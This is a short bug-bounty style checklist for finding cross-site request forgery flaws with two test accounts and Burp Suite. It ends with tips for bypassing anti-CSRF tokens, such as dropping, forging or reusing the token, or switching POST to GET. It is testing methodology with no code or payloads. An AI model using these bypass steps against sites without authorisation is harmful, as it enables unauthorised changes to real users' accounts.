👑Find CSRF
Create two Different User accounts on the target site, Mozilla will be the csrfattacker and Chrome will be the csrfvictim.
Verify your email address if it asks for verification.
In the attacker account sign in and go to profile/account settings.
Try changing the default values on those forms and submit the form.
Capture the request in BurpSuite.
Check if any CSRF token is present or not
If Token is not present then the site may be vulnerable to CSRF.
Now you are good to go, send the request to the repeater and drop the request.
Go to the repeater tab and send the request. If you get 200 responses.
Try again, but this time just change any value in the request and send the request.
Go to your profile and check that the value you sent via burp repeater gets updated in your profile. If it gets updated, then it is vulnerable.
Now build an Exploit: Right-click on the request and choose engagement tools and click on generate CSRF PoC in BURP as an attacker with auto submit script option enabled.
Now in Chrome open the csrfvictin account and in a new tab submit this csrf.html file and the information will get changed in the csrfvictin account.
To cross-verify the change, in the first tab refresh your Settings page.
-------------------------------------------------------------
Some Tips to bypass CSRF tokens
Try removing the token value and parameter from the request and see that the request actually made any changes in the profile, if yes then you can bypass it.
Try adding your own custom / random string into the token parameter replacing the original token. Its length should be equal to the original token
Try using the old tokens in the new request
Try Converting the POST request to a GET request, remove the CSRF token, and send the request.
Try removing anti-CSRF headers from the request.
Last updated